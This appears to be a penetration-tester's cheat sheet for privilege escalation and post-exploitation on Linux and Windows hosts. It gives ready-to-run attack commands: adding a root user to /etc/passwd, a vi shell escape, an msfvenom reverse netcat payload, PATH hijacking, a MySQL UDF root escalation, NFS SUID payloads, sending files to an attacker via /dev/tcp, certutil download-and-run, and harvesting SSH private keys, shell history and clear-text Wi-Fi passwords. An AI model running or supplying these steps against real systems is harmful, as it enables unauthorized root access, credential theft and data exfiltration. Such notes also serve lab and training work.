Skip to content

What to do once you're on the Box

Privilege Escalation


sudo -l will tell you what the user is allowed to execute with sudo without entering a password. Also keep an eye on the environment variables that are inherited (env_keep info).

Check if DLL Loading is possile.

find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null to find SUID, SGID files.

Run curl | sh to get the full information about the box, including files you're allowed to execute which has setuid flag set (sudo permissions).

You can also run another script wget "" -O;chmod 700 which is also very good!

You can also run wget; sh ./ which is an alternative to linPEAS.

To switch between users, once you have the credentials, you can use su <username> -> password.

Have a tough read which files/services can be executed as root from the current user and check with how they can be exploted.

Here are the easiest ones.

Cookbooks for Privilege Escalations: * * * PayloadsAllTheThings - Methodology and Resources/Linux - Privilege * *

Writable /etc/passwd and /etc/shadow file

In case the /etc/passwd is writable we can add another line to it, adding a new user as root. In case the /etc/shadow is writable you can replace password hashes.

The password hash is always between the first two colons like <username>:<passwordhash>:<otherthings>.

There are several ways to generate a new hash.


openssl passwd -1 -salt <somesalt> <newpassword>
# -1 = optional, indicates the use of md5s
# -salt = optional, makes the hash immune against rainbow attacks


mkpasswd -m sha-512 <newpassword>

Add a new user to /etc/passwd

echo <username>:<passwordhash>:0:0:<optional comment>:/root:/bin/bash >> /etc/passwd

Escaping Vi Editor

If vi is listed under the sudo -l output, you can simply run sudo vi and then :!sh to have a root shell trough the editor.

Exploiting crontab

Run cat /etc/crontab to see scheduled tasks, maybe one of them is exploitable.

Take a look at the environment variables defined in the crontab file, you could misled crontab by locating scripts.

In case a script is executed you can create a payload to create a bind/reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=<local/remote ip> lport=8888 R. Don't forget to listen for it with nc -lvnp 8888.

Exploiting PATH environment variable

The PATH environment variable, defined as /path1:/path2:/path3, holds all paths where an executable is searched in. The current directory is not searched as in windows, except the PATH contains a . element.

To exploit the PATH we need a SUID executable which calls another executable without a path information. Use strings <executable> to get a hint if an executable name occurs or execute the executable and check with ps/top if a sub-executable is called at a certain time.

The next step is to create a bash script with the name of the called executable containing a bind/reverse shell or simply just /bin/bash. Maybe it's requited to extend the PATH variable with export PATH=/new/path:$PATH.

cd /tmp
echo "/bin/bash" > ls
chmod +x ls
export PATH=/tmp:$PATH
# execute the SUID file now

MySql Server

In case the mysql server is accessible and is executed as root, we can load a dynamic library that offers us root rights.

cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname, -o raptor_udf2.o -lc
mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/';
create function do_system returns integer soname '';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
/tmp/rootbash -p

Upload SUID files via NFS

In case the victim server has network shares open (nmap -p 135,445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP or via cat /etc/exports) you can try to create a file on this share with the SUID bit set from the attacker server and execute it on the victim server.

Try to read the /etc/exports file which contains the setting flags for each share. The no_root_squash flag means that the files uploaded via the share will remain their SUID bit, otherwise the SUID bit is set to "nobody".

# attacker box
mkdir /tmp/nfs
mount -o rw,vers=2 /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell
chmod +xs /tmp/nfs/shell
# victim box

Kernel Exploits

Kernel Exploits are one of the last ressorts to get higher privileges because it brings the target server in an unstable state.

Linux Exploit Suggester

wget -O
chmod +x

Each found exploit has a level which indicates how successful the attempt would be: * Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications. * Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target. * Less probable - additional manual analysis is needed to verify if kernel is affected. * Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)

Linux Exploit Suggester 2

wget -O

Send files: VICTIM -> ATTACKER

on attacker: nc -lvnp $PORT > /file_to_save

on victim: cat $FILE > /dev/tcp/$HOSTIP/$PORT


certutil.exe -urlcache -split -f "" wp.bat
certutil.exe -urlcache -split -f "" pu.ps1
. ./pu.ps1

Kernel Exploits

Windows Exploit Suggester - Next Generation

Post Exploitation

C2 Servers


Migrate to another process: * ps to get processes thats stable (eg. explorer) * psinject Listener ProcessID with processid and listener

Get windows build number: Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId

If build is < Win10 2004, try powershell/privesc/printdemon (CVE-2020-1048) with the base64 part of the stager and shell restart-computer -force for higher privilege.

Get the Loot


Get the ssh key!

cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa

Get the history of an user

cat ~/.*history | less

Get config files

Search the user's home directory with ls -la and see if you can find configuration directories and files!


Get wlan/wifi passwords on a windows machine (no admin priv needed)

netsh wlan export profile key=clear

Next step

Get on the next box